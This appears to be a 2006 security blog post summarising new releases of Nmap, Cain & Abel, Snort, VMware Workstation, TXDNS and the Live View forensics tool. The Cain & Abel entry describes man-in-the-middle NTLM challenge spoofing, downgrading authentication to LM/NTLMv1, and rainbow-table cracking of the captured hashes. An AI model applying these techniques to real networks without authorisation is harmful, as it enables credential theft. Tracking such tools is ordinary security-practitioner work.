Monday, December 4, 2006

Tools of the Trade - Now w/High Protein Soy!

1) Insecure.org has released Nmap 4.20RC2. Updates include the following:
  • Integrated all of your OS detection submissions since RC1. The DB has increased 13% to 214 fingerprints. Please keep them coming! New fingerprints include versions of z/OS, OpenBSD, Linux, AIX, FreeBSD, Cisco CatOS, IPSO firewall, and a slew of printers and misc. devices. We also got our first Windows 95 fingerprint, submitted anonymously of course :).
  • Fixed (I hope) the "getinterfaces: intf_loop() failed" error which was seen on Windows Vista. The problem was apparently in intf-win32.c of libcnet (need to define MIB_IF_TYPE_MAX to MAX_IF_TYPE rather than 32). Thanks to Dan Griffin (dan(a)jwsecure.com) for tracking this down!
  • Applied a couple minor bug fixes from Marek Majkowski to IP options support (which he previously added) and packet tracing.
  • Incorporated SLNP (Simple Library Network Protocol) version detection support. Thanks to Tibor Csogor (tibi(a)tiborius.net) for the patch.

2) Oxid.it recently released Cain & Abel 4.2. Updates include the following:

  • Cain's MitM NTLM Challenge Spoofing. (Requires APR to be active and a MitM condition between victim hosts).You can now spoof server challenges in NTLM authentications; this feature enables the use of RainbowTables for cracking network hashes. WARNING !!! Enabling Challenge Spoofing cause users to fail authentications so use it carefully.
  • NTLM Session Security authentications downgrade to LM&NTLMv1. The following protocols are supported: SMB, DCE/RPC, TDS, HTTP, POP3, IMAP, SMTP.
  • LM + spoofed challenge Hashes Cryptanalysis via Sorted Rainbow Tables.
  • HALFLM + spoofed challenge Hashes Cryptanalysis via Sorted Rainbow Tables.
  • NTLM + spoofed challenge Hashes Cryptanalysis via Sorted Rainbow Tables.
  • New types of RainbowTables have been added to Winrtgen v2.3. "lmchall" and "ntlmchall" tables can be used against LM and NTLM response hashes for spoofed challenges (default: 0x1122334455667788). "halflmchall" tables can be used against the first 8 bytes LM response hashes for spoofed challenges to recover the first 7 characters of the original password.

3) Snort 2.6.1.1 was released. Fixed problem with snort using high CPU and potentially reprocessing the same TCP reassembled packets at session end or TCP ACK of only part of a packet.

4) On Nov 16th, VMware Workstation 5.5.3, Build 34685 was released. It fixed a whole heap of bugs related to Linux. Of course, you must already have a license to upgrade, but you know that. =)

5) On Nov 11th, Arley Silveira released TXDNS 2.0.0. TXDNS is a Win32 aggressive multithreaded DNS digger. Capable of placing, on the wire, thousands of DNS queries per minute. TXDNS main goal is to expose a domain namespace trough a number of techniques - Typos, TLD rotation, Dictionary attack & Brute force.

6) On the forensics tool front, Live View 0.5 was release not long ago. Live View is a Java-based graphical forensics tool that creates a VMware virtual machine out of a raw (dd-style) disk image or physical disk. This allows the forensic examiner to "boot up" the image or disk and gain an interactive, user-level perspective of the environment, all without modifying the underlying image or disk. Because all changes made to the disk are written to a separate file, the examiner can instantly revert all of his or her changes back to the original pristine state of the disk. The end result is that one need not create extra "throw away" copies of the disk or image to create the virtual machine.

No comments:

Post a Comment